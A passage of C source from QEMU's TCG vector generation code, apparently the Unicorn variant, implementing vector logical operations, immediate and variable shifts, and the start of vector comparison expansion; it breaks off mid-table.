.prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_not(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_eqv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_eqv_i64, .fniv = tcg_gen_eqv_vec, .fno = gen_helper_gvec_eqv, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, -1); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } static const GVecGen2s gop_ands = { .fni8 = tcg_gen_and_i64, .fniv = tcg_gen_and_vec, .fno = gen_helper_gvec_ands, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }; void tcg_gen_gvec_ands(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, tmp, c); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ands); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_andi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, dup_const(vece, c)); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ands); tcg_temp_free_i64(tcg_ctx, tmp); } static const GVecGen2s gop_xors = { .fni8 = tcg_gen_xor_i64, .fniv = tcg_gen_xor_vec, .fno = gen_helper_gvec_xors, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }; void tcg_gen_gvec_xors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, tmp, c); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_xors); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_xori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, dup_const(vece, c)); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_xors); tcg_temp_free_i64(tcg_ctx, tmp); } static const GVecGen2s gop_ors = { .fni8 = tcg_gen_or_i64, .fniv = tcg_gen_or_vec, .fno = gen_helper_gvec_ors, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }; void tcg_gen_gvec_ors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, 
uint32_t maxsz) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, tmp, c); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ors); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_ori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, dup_const(vece, c)); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ors); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_vec_shl8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_8, 0xff << c); tcg_gen_shli_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_vec_shl16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_16, 0xffff << c); tcg_gen_shli_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_gvec_shli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shli_vec, 0 }; static const GVecGen2i g[4] = { { .fni8 = tcg_gen_vec_shl8i_i64, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl8i, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_shl16i_i64, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl16i, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shli_i32, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl32i, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shli_i64, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl64i, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_debug_assert(shift >= 0 && shift < (8 << vece)); if (shift == 0) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_2i(tcg_ctx, dofs, aofs, oprsz, maxsz, shift, &g[vece]); } } void tcg_gen_vec_shr8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_8, 0xff >> c); tcg_gen_shri_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_vec_shr16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_16, 0xffff >> c); tcg_gen_shri_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_gvec_shri(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shri_vec, 0 }; static const GVecGen2i g[4] = { { .fni8 = tcg_gen_vec_shr8i_i64, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr8i, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_shr16i_i64, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr16i, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shri_i32, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr32i, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shri_i64, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr64i, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_debug_assert(shift >= 0 && shift < (8 << vece)); if (shift == 0) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_2i(tcg_ctx, dofs, aofs, oprsz, maxsz, shift, &g[vece]); } } void tcg_gen_vec_sar8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t s_mask = dup_const(MO_8, 0x80 >> c); uint64_t c_mask = dup_const(MO_8, 
                                       0xff >> c);
    TCGv_i64 s = tcg_temp_new_i64(tcg_ctx);

    tcg_gen_shri_i64(tcg_ctx, d, a, c);
    tcg_gen_andi_i64(tcg_ctx, s, d, s_mask);       /* isolate (shifted) sign bit */
    tcg_gen_muli_i64(tcg_ctx, s, s, (2 << c) - 2); /* replicate isolated signs */
    tcg_gen_andi_i64(tcg_ctx, d, d, c_mask);       /* clear out bits above sign */
    tcg_gen_or_i64(tcg_ctx, d, d, s);              /* include sign extension */
    tcg_temp_free_i64(tcg_ctx, s);
}

void tcg_gen_vec_sar16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a,
                            int64_t c)
{
    uint64_t s_mask = dup_const(MO_16, 0x8000 >> c);
    uint64_t c_mask = dup_const(MO_16, 0xffff >> c);
    TCGv_i64 s = tcg_temp_new_i64(tcg_ctx);

    tcg_gen_shri_i64(tcg_ctx, d, a, c);
    tcg_gen_andi_i64(tcg_ctx, s, d, s_mask);       /* isolate (shifted) sign bit */
    tcg_gen_andi_i64(tcg_ctx, d, d, c_mask);       /* clear out bits above sign */
    tcg_gen_muli_i64(tcg_ctx, s, s, (2 << c) - 2); /* replicate isolated signs */
    tcg_gen_or_i64(tcg_ctx, d, d, s);              /* include sign extension */
    tcg_temp_free_i64(tcg_ctx, s);
}

void tcg_gen_gvec_sari(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                       uint32_t aofs, int64_t shift, uint32_t oprsz,
                       uint32_t maxsz)
{
    static const TCGOpcode vecop_list[] = { INDEX_op_sari_vec, 0 };
    static const GVecGen2i g[4] = {
        { .fni8 = tcg_gen_vec_sar8i_i64,
          .fniv = tcg_gen_sari_vec,
          .fno = gen_helper_gvec_sar8i,
          .opt_opc = vecop_list,
          .vece = MO_8 },
        { .fni8 = tcg_gen_vec_sar16i_i64,
          .fniv = tcg_gen_sari_vec,
          .fno = gen_helper_gvec_sar16i,
          .opt_opc = vecop_list,
          .vece = MO_16 },
        { .fni4 = tcg_gen_sari_i32,
          .fniv = tcg_gen_sari_vec,
          .fno = gen_helper_gvec_sar32i,
          .opt_opc = vecop_list,
          .vece = MO_32 },
        { .fni8 = tcg_gen_sari_i64,
          .fniv = tcg_gen_sari_vec,
          .fno = gen_helper_gvec_sar64i,
          .opt_opc = vecop_list,
          .prefer_i64 = TCG_TARGET_REG_BITS == 64,
          .vece = MO_64 },
    };

    tcg_debug_assert(vece <= MO_64);
    tcg_debug_assert(shift >= 0 && shift < (8 << vece));
    if (shift == 0) {
        tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz);
    } else {
        tcg_gen_gvec_2i(tcg_ctx, dofs, aofs, oprsz, maxsz, shift, &g[vece]);
    }
}

/*
 * Specialized generation of vector shifts by a non-constant scalar.
 */
typedef struct {
    void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32);
    void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64);
    void (*fniv_s)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_i32);
    void (*fniv_v)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec);
    gen_helper_gvec_2 *fno[4];
    TCGOpcode s_list[2];
    TCGOpcode v_list[2];
} GVecGen2sh;

static void expand_2sh_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                           uint32_t aofs, uint32_t oprsz, uint32_t tysz,
                           TCGType type, TCGv_i32 shift,
                           void (*fni)(TCGContext *, unsigned, TCGv_vec,
                                       TCGv_vec, TCGv_i32))
{
    TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type);
    uint32_t i;

    for (i = 0; i < oprsz; i += tysz) {
        tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i);
        fni(tcg_ctx, vece, t0, t0, shift);
        tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i);
    }
    tcg_temp_free_vec(tcg_ctx, t0);
}

static void do_gvec_shifts(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                           uint32_t aofs, TCGv_i32 shift, uint32_t oprsz,
                           uint32_t maxsz, const GVecGen2sh *g)
{
    TCGType type;
    uint32_t some;

    check_size_align(oprsz, maxsz, dofs | aofs);
    check_overlap_2(dofs, aofs, maxsz);

    /* If the backend has a scalar expansion, great.
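       The strategy below is tiered: first try the backend's native
       vector-shift-by-scalar opcodes (g->s_list), then variable vector
       shifts with the count duplicated into a vector (g->v_list), then
       the plain i32/i64 loops, and finally the out-of-line helper.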
*/ type = choose_vector_type(tcg_ctx, g->s_list, vece, oprsz, vece == MO_64); if (type) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); switch (type) { case TCG_TYPE_V256: some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2sh_vec(tcg_ctx, vece, dofs, aofs, some, 32, TCG_TYPE_V256, shift, g->fniv_s); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2sh_vec(tcg_ctx, vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, shift, g->fniv_s); break; case TCG_TYPE_V64: expand_2sh_vec(tcg_ctx, vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, shift, g->fniv_s); break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); goto clear_tail; } /* If the backend supports variable vector shifts, also cool. */ type = choose_vector_type(tcg_ctx, g->v_list, vece, oprsz, vece == MO_64); if (type) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); TCGv_vec v_shift = tcg_temp_new_vec(tcg_ctx, type); if (vece == MO_64) { TCGv_i64 sh64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, sh64, shift); tcg_gen_dup_i64_vec(tcg_ctx, MO_64, v_shift, sh64); tcg_temp_free_i64(tcg_ctx, sh64); } else { tcg_gen_dup_i32_vec(tcg_ctx, vece, v_shift, shift); } switch (type) { case TCG_TYPE_V256: some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2s_vec(tcg_ctx, vece, dofs, aofs, some, 32, TCG_TYPE_V256, v_shift, false, g->fniv_v); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2s_vec(tcg_ctx, vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, v_shift, false, g->fniv_v); break; case TCG_TYPE_V64: expand_2s_vec(tcg_ctx, vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, v_shift, false, g->fniv_v); break; default: g_assert_not_reached(); } tcg_temp_free_vec(tcg_ctx, v_shift); tcg_swap_vecop_list(hold_list); goto clear_tail; } /* Otherwise fall back to integral... 
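       In the helper path below, the TCGv_i32 shift count is merged into
       the SIMD descriptor's data field with emitted shift/or ops:

           desc = (shift << SIMD_DATA_SHIFT) | simd_desc(oprsz, maxsz, 0)

       so a single gen_helper_gvec_2-style call carries both the vector
       geometry and the count.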
 */
    if (vece == MO_32 && check_size_impl(oprsz, 4)) {
        expand_2s_i32(tcg_ctx, dofs, aofs, oprsz, shift, false, g->fni4);
    } else if (vece == MO_64 && check_size_impl(oprsz, 8)) {
        TCGv_i64 sh64 = tcg_temp_new_i64(tcg_ctx);
        tcg_gen_extu_i32_i64(tcg_ctx, sh64, shift);
        expand_2s_i64(tcg_ctx, dofs, aofs, oprsz, sh64, false, g->fni8);
        tcg_temp_free_i64(tcg_ctx, sh64);
    } else {
        TCGv_ptr a0 = tcg_temp_new_ptr(tcg_ctx);
        TCGv_ptr a1 = tcg_temp_new_ptr(tcg_ctx);
        TCGv_i32 desc = tcg_temp_new_i32(tcg_ctx);

        tcg_gen_shli_i32(tcg_ctx, desc, shift, SIMD_DATA_SHIFT);
        tcg_gen_ori_i32(tcg_ctx, desc, desc, simd_desc(oprsz, maxsz, 0));
        tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs);
        tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs);

        g->fno[vece](tcg_ctx, a0, a1, desc);

        tcg_temp_free_ptr(tcg_ctx, a0);
        tcg_temp_free_ptr(tcg_ctx, a1);
        tcg_temp_free_i32(tcg_ctx, desc);
        return;
    }

clear_tail:
    if (oprsz < maxsz) {
        expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz);
    }
}

void tcg_gen_gvec_shls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                       uint32_t aofs, TCGv_i32 shift, uint32_t oprsz,
                       uint32_t maxsz)
{
    static const GVecGen2sh g = {
        .fni4 = tcg_gen_shl_i32,
        .fni8 = tcg_gen_shl_i64,
        .fniv_s = tcg_gen_shls_vec,
        .fniv_v = tcg_gen_shlv_vec,
        .fno = {
            gen_helper_gvec_shl8i,
            gen_helper_gvec_shl16i,
            gen_helper_gvec_shl32i,
            gen_helper_gvec_shl64i,
        },
        .s_list = { INDEX_op_shls_vec, 0 },
        .v_list = { INDEX_op_shlv_vec, 0 },
    };

    tcg_debug_assert(vece <= MO_64);
    do_gvec_shifts(tcg_ctx, vece, dofs, aofs, shift, oprsz, maxsz, &g);
}

void tcg_gen_gvec_shrs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                       uint32_t aofs, TCGv_i32 shift, uint32_t oprsz,
                       uint32_t maxsz)
{
    static const GVecGen2sh g = {
        .fni4 = tcg_gen_shr_i32,
        .fni8 = tcg_gen_shr_i64,
        .fniv_s = tcg_gen_shrs_vec,
        .fniv_v = tcg_gen_shrv_vec,
        .fno = {
            gen_helper_gvec_shr8i,
            gen_helper_gvec_shr16i,
            gen_helper_gvec_shr32i,
            gen_helper_gvec_shr64i,
        },
        .s_list = { INDEX_op_shrs_vec, 0 },
        .v_list = { INDEX_op_shrv_vec, 0 },
    };

    tcg_debug_assert(vece <= MO_64);
    do_gvec_shifts(tcg_ctx, vece, dofs, aofs, shift, oprsz, maxsz, &g);
}

void tcg_gen_gvec_sars(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                       uint32_t aofs, TCGv_i32 shift, uint32_t oprsz,
                       uint32_t maxsz)
{
    static const GVecGen2sh g = {
        .fni4 = tcg_gen_sar_i32,
        .fni8 = tcg_gen_sar_i64,
        .fniv_s = tcg_gen_sars_vec,
        .fniv_v = tcg_gen_sarv_vec,
        .fno = {
            gen_helper_gvec_sar8i,
            gen_helper_gvec_sar16i,
            gen_helper_gvec_sar32i,
            gen_helper_gvec_sar64i,
        },
        .s_list = { INDEX_op_sars_vec, 0 },
        .v_list = { INDEX_op_sarv_vec, 0 },
    };

    tcg_debug_assert(vece <= MO_64);
    do_gvec_shifts(tcg_ctx, vece, dofs, aofs, shift, oprsz, maxsz, &g);
}

/*
 * Expand D = A << (B % element bits)
 *
 * Unlike scalar shifts, where it is easy for the target front end to
 * include the modulo as part of the expansion, for vector shifts the
 * masking of the count must be done explicitly here.  If the target
 * naturally includes the modulo as part of the operation, great!  If
 * the target has some other behaviour for out-of-range shifts, then
 * it could not use this function anyway, and would need to do its own
 * expansion with custom functions.
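 *
 * Concretely, tcg_gen_shlv_mod_vec below masks the per-element count
 * with (8 << vece) - 1, e.g. 15 for MO_16, before issuing shlv, and
 * the i32/i64 fallbacks mask with 31 and 63 respectively.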
*/ static void tcg_gen_shlv_mod_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, t, (8 << vece) - 1); tcg_gen_and_vec(tcg_ctx, vece, t, t, b); tcg_gen_shlv_vec(tcg_ctx, vece, d, a, t); tcg_temp_free_vec(tcg_ctx, t); } static void tcg_gen_shl_mod_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t, b, 31); tcg_gen_shl_i32(tcg_ctx, d, a, t); tcg_temp_free_i32(tcg_ctx, t); } static void tcg_gen_shl_mod_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, b, 63); tcg_gen_shl_i64(tcg_ctx, d, a, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_shlv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shlv_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl8v, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl16v, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shl_mod_i32, .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl32v, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shl_mod_i64, .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl64v, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* * Similarly for logical right shifts. */ static void tcg_gen_shrv_mod_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, t, (8 << vece) - 1); tcg_gen_and_vec(tcg_ctx, vece, t, t, b); tcg_gen_shrv_vec(tcg_ctx, vece, d, a, t); tcg_temp_free_vec(tcg_ctx, t); } static void tcg_gen_shr_mod_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t, b, 31); tcg_gen_shr_i32(tcg_ctx, d, a, t); tcg_temp_free_i32(tcg_ctx, t); } static void tcg_gen_shr_mod_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, b, 63); tcg_gen_shr_i64(tcg_ctx, d, a, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_shrv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shrv_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr8v, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr16v, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shr_mod_i32, .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr32v, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shr_mod_i64, .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr64v, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* * Similarly for arithmetic right shifts. 
*/ static void tcg_gen_sarv_mod_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, t, (8 << vece) - 1); tcg_gen_and_vec(tcg_ctx, vece, t, t, b); tcg_gen_sarv_vec(tcg_ctx, vece, d, a, t); tcg_temp_free_vec(tcg_ctx, t); } static void tcg_gen_sar_mod_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t, b, 31); tcg_gen_sar_i32(tcg_ctx, d, a, t); tcg_temp_free_i32(tcg_ctx, t); } static void tcg_gen_sar_mod_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, b, 63); tcg_gen_sar_i64(tcg_ctx, d, a, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_sarv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_sarv_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar8v, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar16v, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_sar_mod_i32, .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar32v, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_sar_mod_i64, .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar64v, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* Expand OPSZ bytes worth of three-operand operations using i32 elements. */ static void expand_cmp_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, TCGCond cond) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); tcg_gen_setcond_i32(tcg_ctx, cond, t0, t0, t1); tcg_gen_neg_i32(tcg_ctx, t0, t0); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t0); } static void expand_cmp_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, TCGCond cond) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); tcg_gen_setcond_i64(tcg_ctx, cond, t0, t0, t1); tcg_gen_neg_i64(tcg_ctx, t0, t0); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static void expand_cmp_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t tysz, TCGType type, TCGCond cond) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); tcg_gen_cmp_vec(tcg_ctx, cond, vece, t0, t0, t1); tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t0); } void tcg_gen_gvec_cmp(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, uint32_t
dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode cmp_list[] = { INDEX_op_cmp_vec, 0 }; static gen_helper_gvec_3 * const eq_fn[4] = { gen_helper_gvec_eq8, gen_helper_gvec_eq16, gen_helper_gvec_eq32, gen_helper_gvec_eq64 }; static gen_helper_gvec_3 * const ne_fn[4] = { gen_helper_gvec_ne8, gen_helper_gvec_ne16, gen_helper_gvec_ne32, gen_helper_gvec_ne64 }; static gen_helper_gvec_3 * const lt_fn[4] = { gen_helper_gvec_lt8, gen_helper_gvec_lt16, gen_helper_gvec_lt32, gen_helper_gvec_lt64 }; static gen_helper_gvec_3 * const le_fn[4] = { gen_helper_gvec_le8, gen_helper_gvec_le16, gen_helper_gvec_le32, gen_helper_gvec_le64 }; static gen_helper_gvec_3 * const ltu_fn[4] = { gen_helper_gvec_ltu8, gen_helper_gvec_ltu16, gen_helper_gvec_ltu32, gen_helper_gvec_ltu64 }; static gen_helper_gvec_3 * const leu_fn[4] = { gen_helper_gvec_leu8, gen_helper_gvec_leu16, gen_helper_gvec_leu32, gen_helper_gvec_leu64 }; static gen_helper_gvec_3 * const * const fns[16] = { [TCG_COND_EQ] = eq_fn, 